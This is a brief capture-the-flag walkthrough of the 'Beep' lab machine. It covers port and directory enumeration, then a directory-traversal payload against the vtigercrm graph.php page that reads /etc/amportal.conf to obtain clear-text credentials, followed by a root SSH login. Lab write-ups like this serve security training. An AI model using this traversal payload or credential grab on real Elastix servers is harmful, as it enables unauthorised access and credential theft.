created by ch4p // 10.10.10.7
// Enumeration //
Beep is the first machine we’ve encountered that is just going to throw a whole lot of spaghetti at you, and force you to dig through it. Go ahead and kick a nmap, and watch those ports add up. At the same time, get dirb running against the web server, and go ahead and browse to the primary web page.
nmap -Pn -A -p- -v 10.10.10.7 -oG /home/rp/Desktop/Beep/nmap
dirb http://10.10.10.7 -f
We get a whole mess of ports thrown at us, with several vulnerabilities amongst them. However, I think the intended path is via the elastix page, and a quick google search turns up a well documented vulnerability. This vulnerability exploits a misconfiguration, that allows users to conduct unauthenticated directory traversal. To exploit is, simple append the following path to the target IP.
// Exploitation //
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
And in return, we get a whole bunch of information, including what appears to be clear text credentials and passwords. Let’s give them a go in an ssh session. It is running a legacy key exchange, so if you get an error with your standard SSH, try the sytax below:
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7
And just like that, we’re in, as root, and we have our flags. Very simple machine, but a good look at how directory traversal can be exploited if not properly secured and sanitized.